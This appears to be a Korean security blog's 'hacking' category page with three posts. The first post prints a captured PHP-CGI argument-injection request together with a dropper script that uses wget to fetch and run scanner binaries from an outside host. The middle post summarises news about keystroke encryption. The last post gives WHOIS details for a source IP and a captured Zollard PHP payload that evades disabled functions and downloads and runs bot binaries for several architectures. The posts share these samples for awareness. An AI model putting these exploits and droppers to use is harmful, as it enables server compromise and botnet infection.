'해킹'에 해당되는 글 189건

  1. 2014.09.04 쉘코드 웹공격 사례 샘플
  2. 2014.05.08 키보드 입력값을 암호화하는 기술
  3. 2014.03.07 웹사이트 침해시도 탐지코드
2014.09.04 10:03

쉘코드 웹공격 사례 샘플

POST /cgi-bin/php?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E HTTP/1.0


<?php system("wget http://221.132.xxx.26/sh -O /tmp/sh;sh /tmp/sh;rm -rf /tmp/sh");


/tmp/sh

#!/bin/bash

dontrun=""

arch=`uname -m`

cd /dev/shm

function runPnscan()

{


cd /dev/shm

chmod +x pnscan php

bash run &


}


function isPnscanOn()

{

        pid=`pidof pnscan`

        if [ "$pid" == "" ];then


                retval=0

        else

                retval=1

        fi

        echo "$retval"

}

        cd /dev/shm

        if [ ! -f pnscan ];then

        case "$arch" in

                "x86_64")

                wget -q http://bont.xxx/ar/64.tgz -O 64.tgz

                tar xvzf 64.tgz

                rm -rf 64.tgz

                ;;

                *)

                wget -q http://bont.xxx/ar/86.tgz -O 86.tgz

                tar xvzf 86.tgz

                rm -rf 86.tgz

                ;;

        esac

        fi



if [ $(isPnscanOn) == 1 ];then

#        echo "Running"

        exit

else

        echo "Not Running"

        if [ "$dontrun" != "1" ];then

                $(runPnscan)

        fi

fi

rm -rf /dev/shm/run

rm -rf /dev/shm/pnscan



Trackback 0 Comment 0
2014.05.08 18:00

키보드 입력값을 암호화하는 기술

키보드 입력값을 암호화하는 기술 
정보출처 IEEE Computer Magazine 
원문언어 영어 
출판날짜 2005년 10월 00일 
국 가 미국 
주제분야 컴퓨터 시스템 및 하드웨어, 운영체제(R12) 

BlueGem 시큐리티사는 최근 기존의 암호 시스템이 제공하지 못했던 키보드 입력 신호를 암호화하는 ''LocalSSL''이라는 암호화 시스템 기술을 개발했다고 밝혔다. 이 기술을 사용하면 해커들이 키로거(keylogger) 툴을 사용하여 사용자의 키보드 입력 값을 알아내는 해킹을 원천적으로 봉쇄할 수 있다. 

기존의 암호화 기술은 주로 통신 시스템상의 송수신 데이터를 암호화하는 것으로 사용자의 키보드와 로컬 응용 사이의 키 입력 신호를 암호화 하지는 못했다. 키보드와 로컬 응용 사이에는 키로거 프로그램이 독립적으로, 혹은 트로이 목마 프로그램에 포함되어 존재하여 사용자의 패스워드 정보나 사회 보장 번호, 신용 카드 정보, 재정 정보, 그 외 개인 정보를 가로채어 해커에게 전송한다고 BlueGem사의 CTO인 박죠씨는 말하고 있다. 

현재 한국에서 사용되고 있는 LocalSSL 기술은 키보드 입력 신호에 대하여 128 비트 암호화 기술을 사용한다. 이 기술은 BlueGem사가 기존의 인터넷상에서 사용 되던 SSL 암호 기술을 수정한 것으로, LocalSSL 기술은 키 해킹 프로그램이 주로 존재하는 영역인 운영 체제를 우회하여 암호화 된 키 입력 값을 전송한다. 박씨는 키로거 프로그램은 주로 메시지 큐나 디바이스 드라이버 영역, 그리고 운영 체제 영역에 존재하면서 사용자 키 입력 값을 가로챈다고 한다. 

BlueGem 프로그램은 보호하고자 하는 응용의 대상에 따라 LocalSSL 인터넷과 LocalSSL 이메일, Local SSL 마이크로소프트 오피스와 같은 3개의 패키지로 구성된다. 이 제품은 모든 서버 하드웨어와 소프트웨어 제품과 호환성을 가지며, 인스톨된 프로그램의 메모리 사용량은 600K 바이트에 불과하다. 

박씨에 따르면 이 프로그램을 사용하면 사용자들은 온라인 뱅킹이나 주식 거래, 가상 사설망 접근, 신용 카드 정보, 모기지론 등과 같은 응용을 안전하게 사용할 수 있다고 한다. 이에 대해 시장 분석 업체인 아버딘 그룹 (Aberdeen Group)의 릭 사이아 (Rick Saia)씨는 "BlueGem사이 LocalSSL 제품은 비즈니스와 개인 정보보호를 위한 중요한 기능을 제공해 주며, 특히 많은 제약이 있는 금융 서비스나 건강 보험 등의 응용에 유용할 것"이라고 말한다. 



출처 : www.gtp.or.kr



Trackback 0 Comment 0
2014.03.07 17:33

웹사이트 침해시도 탐지코드

아이피 : 65.185.5.104

organization:Class-Name:organization

organization:ID:NETBLK-ISRR-65.185.0.0-17

organization:Auth-Area:65.185.0.0/17

organization:Org-Name:Road Runner

organization:Tech-Contact:ipaddreg@rr.com

organization:Street-Address:13820 Sunrise Valley Drive

organization:City:Herndon

organization:State:VA

organization:Postal-Code:20171

organization:Country-Code:US

organization:Phone:703-345-3151

organization:Updated:2014-03-06 10:40:50

organization:Created:2014-03-06 10:40:50

organization:Admin-Contact:IPADD-ARIN


탐지코드:

<?php

echo "Zollard";

$disablefunc = @ini_get("disable_functions");

if (!empty($disablefunc))

{

 $disablefunc = str_replace(" ","",$disablefunc);

 $disablefunc = explode(",",$disablefunc);

}

function myshellexec($cmd)

{

 global $disablefunc;

 $result = "";

 if (!empty($cmd))

 {

  if (is_callable("exec") and !in_array("exec",$disablefunc)) {exec($cmd,$result); $result = join("\n",$result);}

  elseif (($result = `$cmd`) !== FALSE) {}

  elseif (is_callable("system") and !in_array("system",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); system($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;}

  elseif (is_callable("passthru") and !in_array("passthru",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); passthru($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;}

  elseif (is_resource($fp = popen($cmd,"r")))

  {

   $result = "";

   while(!feof($fp)) {$result .= fread($fp,1024);}

   pclose($fp);

  }

 }

 return $result;

}

myshellexec("rm -rf /tmp/armeabi;wget -P /tmp http://65.185.5.104:58455/armeabi;chmod +x /tmp/armeabi");

myshellexec("rm -rf /tmp/arm;wget -P /tmp http://65.185.5.104:58455/arm;chmod +x /tmp/arm");

myshellexec("rm -rf /tmp/ppc;wget -P /tmp http://65.185.5.104:58455/ppc;chmod +x /tmp/ppc");

myshellexec("rm -rf /tmp/mips;wget -P /tmp http://65.185.5.104:58455/mips;chmod +x /tmp/mips");

myshellexec("rm -rf /tmp/mipsel;wget -P /tmp http://65.185.5.104:58455/mipsel;chmod +x /tmp/mipsel");

myshellexec("rm -rf /tmp/x86;wget -P /tmp http://65.185.5.104:58455/x86;chmod +x /tmp/x86");

myshellexec("rm -rf /tmp/nodes;wget -P /tmp http://65.185.5.104:58455/nodes;chmod +x /tmp/nodes");

myshellexec("rm -rf /tmp/sig;wget -P /tmp http://65.185.5.104:58455/sig;chmod +x /tmp/sig");

myshellexec("/tmp/armeabi;/tmp/arm;/tmp/ppc;/tmp/mips;/tmp/mipsel;/tmp/x86;");

?>



Trackback 0 Comment 0